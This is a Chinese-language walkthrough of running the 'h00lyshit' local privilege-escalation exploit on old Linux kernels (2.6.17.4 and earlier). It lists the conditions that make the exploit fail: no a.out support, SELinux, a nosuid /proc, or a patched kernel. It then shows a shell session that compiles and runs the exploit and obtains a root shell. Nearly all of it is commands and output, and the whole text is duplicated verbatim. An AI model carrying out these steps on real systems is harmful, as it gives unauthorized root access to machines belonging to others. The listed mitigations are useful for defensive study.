导读:
1.内核CONFIG_BINFMT_AOUT选项被设置为n或内核不支持a.out (Assembler.OUTput)格式,会出现错误failed: Exec format error
现在distro的内核不加入a.out的支持的,比如fedora的内核:
$cat /boot/config-2.6.14-1.1637_FC4 | grep AOUT
# CONFIG_BINFMT_AOUT is not set
2.启用SELinux,会导致错误failed: Permission denied
$ sestatus|grep SELinux&more /etc/selinux/config|grep SELINUX
SELinux status: enabled
SELINUX=enabled
3.在/etc/fstab中对/proc增加了nosuid
$ cat /etc/fstab | grep proc
proc /proc proc defaults,noexec,nosuid 0 0
4.打了补丁或版本不符
Linux Kernel <= 2.6.17.4
$ uname -a
Linux localhost.localdomain 2.6.13-42.ELsmp #1 SMP Sat Aug 12 09:39:11 CDT 2006 i686 i686 i386 GNU/Linux
$ cat /etc/fstab | grep proc
proc /proc proc defaults 0 0
$ sestatus|grep SELinux&more /etc/selinux/config|grep SELINUX
SELinux status: disabled
SELINUX=disabled
$ grep CONFIG _BINFMT_AOUT /boot/config-2.6.13-42.EL
CONFIG_BINFMT_AOUT=y
$ dd if=/dev/zero of=/tmp/out.tmp bs=1M count=100
$ du -sh /tmp/out.tmp
100M /tmp/out.tmp
$ gcc h00lyshit.c -o h00lyshit
$ cat /usr/lib/* >/dev/null 2>/dev/null
$ ./h00lyshit /tmp/out.tmp
preparing
trying to exploit out.tmp
# id
uid=0(root)
#
1.内核CONFIG_BINFMT_AOUT选项被设置为n或内核不支持a.out (Assembler.OUTput)格式,会出现错误failed: Exec format error
现在distro的内核不加入a.out的支持的,比如fedora的内核:
$cat /boot/config-2.6.14-1.1637_FC4 | grep AOUT
# CONFIG_BINFMT_AOUT is not set
2.启用SELinux,会导致错误failed: Permission denied
$ sestatus|grep SELinux&more /etc/selinux/config|grep SELINUX
SELinux status: enabled
SELINUX=enabled
3.在/etc/fstab中对/proc增加了nosuid
$ cat /etc/fstab | grep proc
proc /proc proc defaults,noexec,nosuid 0 0
4.打了补丁或版本不符
Linux Kernel <= 2.6.17.4
$ uname -a
Linux localhost.localdomain 2.6.13-42.ELsmp #1 SMP Sat Aug 12 09:39:11 CDT 2006 i686 i686 i386 GNU/Linux
$ cat /etc/fstab | grep proc
proc /proc proc defaults 0 0
$ sestatus|grep SELinux&more /etc/selinux/config|grep SELINUX
SELinux status: disabled
SELINUX=disabled
$ grep CONFIG _BINFMT_AOUT /boot/config-2.6.13-42.EL
CONFIG_BINFMT_AOUT=y
$ dd if=/dev/zero of=/tmp/out.tmp bs=1M count=100
$ du -sh /tmp/out.tmp
100M /tmp/out.tmp
$ gcc h00lyshit.c -o h00lyshit
$ cat /usr/lib/* >/dev/null 2>/dev/null
$ ./h00lyshit /tmp/out.tmp
preparing
trying to exploit out.tmp
# id
uid=0(root)
#